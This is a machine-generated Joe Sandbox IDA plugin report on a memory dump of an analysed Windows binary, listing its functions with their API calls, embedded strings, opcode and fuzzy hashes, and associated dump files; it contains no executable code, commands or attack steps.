Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 3c08a89c4569a8722ba30c2b4c579797bb26fc3ab1033b00c83ee03eccfda793
Instruction ID: 50b965c02f0d0e561b9ae61c2dcdc3a1f0d2362622597d07f3652e65b27cf2d5
Opcode Fuzzy Hash: 3c08a89c4569a8722ba30c2b4c579797bb26fc3ab1033b00c83ee03eccfda793
Instruction Fuzzy Hash: 1D011731D11A2E9BDF049FE9E88DAEDBBB8FB08711F404556E905B3540DB3095A0CBA5

Function 00257D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00257C62,80070057,?,?,?,00258073), ref: 00257D45
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00257C62,80070057,?,?), ref: 00257D60
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00257C62,80070057,?,?), ref: 00257D6E
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00257C62,80070057,?), ref: 00257D7E
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00257C62,80070057,?,?), ref: 00257D8A

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 208c2b59a4ee6b15d216287512e0a37e2951add2a289aaf390f7ba760c455d6d
Instruction ID: 5355d19cbed3780c040e2b90813af205c23183093faf420c736670e399bb7e3a
Opcode Fuzzy Hash: 208c2b59a4ee6b15d216287512e0a37e2951add2a289aaf390f7ba760c455d6d
Instruction Fuzzy Hash: 64017C72626219AFDB114F54EC88BAA7BBDEF847A2F144025FD08D6214D771ED14CBA0

Function 00258CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00258CDE
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00258CE8
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00258CF7
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00258CFE
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00258D14

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 87e8f756a58fa204f8d5000d737e015ceff561ce16268409a332a3fc940889ed
Instruction ID: 425d5e4db79e8c0df4f17328c52af19a5e2783392b9586fab96b7058d1c97616
Opcode Fuzzy Hash: 87e8f756a58fa204f8d5000d737e015ceff561ce16268409a332a3fc940889ed
Instruction Fuzzy Hash: CBF0AF31211209AFEF101FF4ACCDE6B3BACEF89755B104126F945D2190CAB0EC14DB60

Function 00258D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00258D3F
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00258D49
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00258D58
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00258D5F
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00258D75

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: c8ebcd6636ccf4bbbe1a96a8d3021251df87748ed818fdff2e40b8d9ca07fcb5
Instruction ID: 8db204c4917801ae952bb554d4c433e1c2f45dd50d2a81b86b17b2351f7ebba5
Opcode Fuzzy Hash: c8ebcd6636ccf4bbbe1a96a8d3021251df87748ed818fdff2e40b8d9ca07fcb5
Instruction Fuzzy Hash: 33F08C31211209AFEB110FB4ECCCF6B3BACEF89B69F040116F944D2190CAB09D15DA60

Function 0025CD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0025CD90
GetWindowTextW.USER32(00000000,?,00000100), ref: 0025CDA7
MessageBeep.USER32(00000000), ref: 0025CDBF
KillTimer.USER32(?,0000040A), ref: 0025CDDB
EndDialog.USER32(?,00000001), ref: 0025CDF5

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 75180023103dfdf84a7427bfae97a557cfd4bd439214ea19d23fa197d40eb042
Instruction ID: a28c8a62056cb53f870f85f18dc20ea5efeb26082436b77f2a6378d5883e470d
Opcode Fuzzy Hash: 75180023103dfdf84a7427bfae97a557cfd4bd439214ea19d23fa197d40eb042
Instruction Fuzzy Hash: 17018B71511708AFEB215F50ED8EF967B7CFB00706F10066AF582A10D1DBF0A9688B84

Function 0020178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0020179B
StrokeAndFillPath.GDI32(?,?,0023BBC9,00000000,?), ref: 002017B7
SelectObject.GDI32(?,00000000), ref: 002017CA
DeleteObject.GDI32 ref: 002017DD
StrokePath.GDI32(?), ref: 002017F8

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: f0d8ac98d232d537e910ad5c9ba9890bc9e9971dc6f6018eed1800cf45035771
Instruction ID: 1a76a1f6e721bf5cc99a92bce8b717dcaa217fa17f1071bfe9640b049108cd1e
Opcode Fuzzy Hash: f0d8ac98d232d537e910ad5c9ba9890bc9e9971dc6f6018eed1800cf45035771
Instruction Fuzzy Hash: B3F0C431018709EFDB215F26FC8CB597BB4AB00326F148315F929551F1C73189A5EF10

Function 0026C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0026CA75
CoCreateInstance.OLE32(00293D3C,00000000,00000001,00293BAC,?), ref: 0026CA8D

Part of subcall function 00211A36: _memmove.LIBCMT ref: 00211A77

CoUninitialize.OLE32 ref: 0026CCFA

Strings

.lnk, xrefs: 0026CA09, 0026CA31, 0026CA3B

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 1f5f9a53795b5f7461bb92b314385bdc86b4d17797eb02415ece55c693887df5
Instruction ID: 4edbd82acc88fdabfb3c648cf6f49291958fe74ab02d819e55aaeac955869a67
Opcode Fuzzy Hash: 1f5f9a53795b5f7461bb92b314385bdc86b4d17797eb02415ece55c693887df5
Instruction Fuzzy Hash: 5AA15CB1114305AFD300EF64C881EAFB7E8EF94344F00891DF655972A2EB70EA59CB92

Function 0020E3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00220FE6: std::exception::exception.LIBCMT ref: 0022101C
Part of subcall function 00220FE6: __CxxThrowException@8.LIBCMT ref: 00221031

Part of subcall function 00211A36: _memmove.LIBCMT ref: 00211A77

Part of subcall function 00211680: _memmove.LIBCMT ref: 002116DB

__swprintf.LIBCMT ref: 0020E598

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0020E431

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 8d9ac40ed4721be317386e69d7cf53aa724ef6177059a5721e03f75b95fdcf01
Instruction ID: 4adc65e41aed04d3bfc9bdc05dce7300a61f31c50bcb4860957ca091dcd3c033
Opcode Fuzzy Hash: 8d9ac40ed4721be317386e69d7cf53aa724ef6177059a5721e03f75b95fdcf01
Instruction Fuzzy Hash: 7F919171124311AFCB18EF24D895C6EB7E8EF95304F41091DF586972A2EA30EDA4CF92

Function 0022523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 002252CD

Part of subcall function 00230320: __87except.LIBCMT ref: 0023035B

Strings

pow, xrefs: 002252A5, 002252C2

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: b118d19b399d00ba14bb3d26c5e9bcefe1384bf337c032e91338a04bd7202978
Instruction ID: 2f1a72799a14d37f88a4a8aab9ddb6ce06dcb67609eda480c264b358cefa3659
Opcode Fuzzy Hash: b118d19b399d00ba14bb3d26c5e9bcefe1384bf337c032e91338a04bd7202978
Instruction Fuzzy Hash: D651CEA0D39A13E7CB14BF64E8A037A37949B00750F34C999E5C1851E5EF748DF49A62

Function 00220654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 00220690
#, xrefs: 00220699

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 586efd70c101ad22ff0438c0ed3ace5f4554357414efab5dc1c289791a3f589a
Instruction ID: b213625a6302c3d1540587594b41bad8a39dbfbd2caa0dc4235ca546edf0ca1e
Opcode Fuzzy Hash: 586efd70c101ad22ff0438c0ed3ace5f4554357414efab5dc1c289791a3f589a
Instruction Fuzzy Hash: E5515675420266DFCF11DF68D488AFABBA4EF55320F540055EC819B291C730ACBACB60

Function 0020E7F7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0020E937
_memmove.LIBCMT ref: 0020E9D0
_free.LIBCMT ref: 0020E9F6
_memmove.LIBCMT ref: 0020EAA9

Strings

#V!, xrefs: 0020E9E2

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _memmove$_free
String ID: #V!
API String ID: 2620147621-1707264807
Opcode ID: 7107cf44e81b0bbfe213961fde7b2539b2877876d04bef8de488c86f0d33f597
Instruction ID: d91f59d417003094d49ebb15eafe7d5c210dfa85ec0f08a696de73a1228dea22
Opcode Fuzzy Hash: 7107cf44e81b0bbfe213961fde7b2539b2877876d04bef8de488c86f0d33f597
Instruction Fuzzy Hash: B0515C716243519FDB24CF24C480B2EB7E5FF89314F05492DE499873A2E731D861CB92

Function 0021CF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0021CFC2
_memmove.LIBCMT ref: 0021D060
_memset.LIBCMT ref: 0021D084

Strings

ERCP, xrefs: 0021CF2D

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 23d74a9b56c2abcbedcfbe3985b4ed6da648d7ee37ed3e0979f9ff056dde206e
Instruction ID: 634e1f0ff956b15831ecab754e29fb876619ca3e54518582fe79ad10be493d50
Opcode Fuzzy Hash: 23d74a9b56c2abcbedcfbe3985b4ed6da648d7ee37ed3e0979f9ff056dde206e
Instruction Fuzzy Hash: 4F51B57192070ADBDB24CF64C8817EABBE8EF18310F24856EE84AD7251E770D6E5CB50

Function 0025A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00261CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00259E4E,?,?,00000034,00000800,?,00000034), ref: 00261CE5

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0025A3F7

Part of subcall function 00261C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00259E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00261CB0

Part of subcall function 00261BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00261C08
Part of subcall function 00261BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00259E12,00000034,?,?,00001004,00000000,00000000), ref: 00261C18
Part of subcall function 00261BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00259E12,00000034,?,?,00001004,00000000,00000000), ref: 00261C2E

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0025A464
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0025A4B1

Strings

@, xrefs: 0025A4C9

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 5a98e8e499fd2460abf327b48daad69f4f2801d2878b080ba707517b04ce8ead
Instruction ID: b4e2308490345d4a5f6f6318daa279fa675ff460b7ad6a5a0a4bb75cc60e486d
Opcode Fuzzy Hash: 5a98e8e499fd2460abf327b48daad69f4f2801d2878b080ba707517b04ce8ead
Instruction Fuzzy Hash: CF413C7291021CAFDB10DFA4CD86ADEBBB8EB45300F044195FA55B7180DA716EA9CFA1

Function 002879FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00287A86
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00287A9A
SendMessageW.USER32(?,00001002,00000000,?), ref: 00287ABE

Strings

SysMonthCal32, xrefs: 00287A51

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 1e2108426a3c33922df2026fc301d63248e690479c437e3ea91e7cc1e35d44d1
Instruction ID: 1cf446f236f2525e8f45c7d7436190deefbfa0a250672ab33f4c7eed1455496c
Opcode Fuzzy Hash: 1e2108426a3c33922df2026fc301d63248e690479c437e3ea91e7cc1e35d44d1
Instruction Fuzzy Hash: 8221BF32620219BFDF159F50CC86FEE3B69EF48724F210214FE146B1D1DAB1E8649BA0

Function 002881B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0028826F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0028827D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00288284

Strings

msctls_updown32, xrefs: 002881E9

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: df55627adff26266057a9fc929c47d5e673e8504426efdbb7d7dbe94cd16991f
Instruction ID: 3a8c5c70def6e38b5142e250cc3a494477ad407cf2c3f5a9f320eea7161f42ad
Opcode Fuzzy Hash: df55627adff26266057a9fc929c47d5e673e8504426efdbb7d7dbe94cd16991f
Instruction Fuzzy Hash: 5D21B2B5614209AFDB00EF54DCC9D6737EDEB5A354B440159FA0497291CB70EC21DFA0

Function 002872D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00287360
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00287370
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00287395

Strings

Listbox, xrefs: 0028732D

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: cd01f931d7b084ba1d56e749082a2100bddeee0e9052019c0fa64f7a28402716
Instruction ID: 195c8062666b1a6d5ff3ca4aa25948ea204b2ec9d29de1ab2a6d8978681101d8
Opcode Fuzzy Hash: cd01f931d7b084ba1d56e749082a2100bddeee0e9052019c0fa64f7a28402716
Instruction Fuzzy Hash: 9121F232625119BFDF129F54DC85EBF37AAEB89760F208124FD049B1D0C671EC21ABA0

Function 00287D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00287D97
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00287DAC
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00287DB9

Strings

msctls_trackbar32, xrefs: 00287D6E

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: e8013fa9973d3e5be19ebd0e31cb9f87604e78770a87bc7eaa5a2975fccc8c8e
Instruction ID: 67dfcb6a64a33c2ec3bbf1c7f68154e79e344b8eaaa5f69259f6226f4776c791
Opcode Fuzzy Hash: e8013fa9973d3e5be19ebd0e31cb9f87604e78770a87bc7eaa5a2975fccc8c8e
Instruction Fuzzy Hash: 0E112376224209BEEF20AF60CC05FEB77A9EF89B14F214119FA44A60E0C771D820CB20

Function 0023B4F1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0023B544: _memset.LIBCMT ref: 0023B551

Part of subcall function 00220B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0023B520,?,?,?,0020100A), ref: 00220B79

IsDebuggerPresent.KERNEL32(?,?,?,0020100A), ref: 0023B524
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0020100A), ref: 0023B533

Strings

=*, xrefs: 0023B514
ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0023B52E

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
